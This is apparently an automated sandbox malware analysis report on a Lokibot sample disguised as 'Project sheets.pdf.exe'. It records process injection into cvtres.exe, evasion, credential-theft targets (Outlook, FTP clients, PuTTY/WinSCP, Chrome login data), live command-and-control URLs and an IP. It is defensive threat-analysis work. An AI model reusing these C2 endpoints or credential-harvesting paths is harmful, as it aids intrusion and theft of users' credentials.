Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Project sheets.pdf.exe TID: 5304	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4052	Thread sleep time: -240000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\Project sheets.pdf.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Project sheets.pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

3_2_00403D74

Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: Project sheets.pdf.exe, 00000000.00000002.246724890.000000000437C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
Source: Project sheets.pdf.exe, 00000000.00000002.246969178.000000000440D000.00000004.00000800.00020000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246906409.00000000043C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
Source: Project sheets.pdf.exe, 00000000.00000002.246471391.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246636872.000000000431E000.00000004.00000800.00020000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246236248.00000000041EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
Source: Project sheets.pdf.exe, 00000000.00000002.247111650.0000000004455000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Code function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,

3_2_00402B7C

Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Code function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]

3_2_0040317B

Source: C:\Users\user\Desktop\Project sheets.pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 415000	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 4A0000	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 4CF1008	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Project sheets.pdf.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Project sheets.pdf.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Jump to behavior
Source: C:\Users\user\Desktop\Project sheets.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Jump to behavior

Source: C:\Users\user\Desktop\Project sheets.pdf.exe

Queries volume information: C:\Users\user\Desktop\Project sheets.pdf.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Project sheets.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Code function: 3_2_00406069 GetUserNameW,

3_2_00406069

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 00000003.00000002.501322554.0000000005046000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTR
Source: Yara match	File source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: PopPassword		3_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: SmtpPassword		3_2_0040D069

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Source: Yara match	File source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Lokibot

Source: Yara match	File source: 00000003.00000002.501322554.0000000005046000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTR
Source: Yara match	File source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	1 Access Token Manipulation	1 Disable or Modify Tools	2 OS Credential Dumping	1 Account Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	311 Process Injection	11 Deobfuscate/Decode Files or Information	1 Input Capture	1 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	13 Obfuscated Files or Information	2 Credentials in Registry	13 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	12 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	1 Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Project sheets.pdf.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.0.cvtres.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.cvtres.exe.400000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.Project sheets.pdf.exe.41d5530.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.cvtres.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.cvtres.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.cvtres.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.cvtres.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.cvtres.exe.400000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://tixfilmz.gq/Devil/PWS/fre.php	100%	Avira URL Cloud	malware
https://tixfilmz.gq/Devil/PWS/fre.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tixfilmz.gq	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: safe	unknown
http://tixfilmz.gq/Devil/PWS/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	cvtres.exe, cvtres.exe, 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://tixfilmz.gq/Devil/PWS/fre.php	cvtres.exe, 00000003.00000002.500737023.000000000049F000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	tixfilmz.gq	European Union		13335	CLOUDFLARENETUS	true
188.114.96.3	unknown	European Union		13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	682148
Start date and time:	2022-08-11 06:41:08 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Project sheets.pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@74/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 97.9% (good quality ratio 93.9%) Quality average: 76.9% Quality standard deviation: 28.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 62 Number of non-executed functions: 17
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115
Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:42:14	API Interceptor	71x Sleep call for process: cvtres.exe modified

Joe Sandbox View / Context

IPs

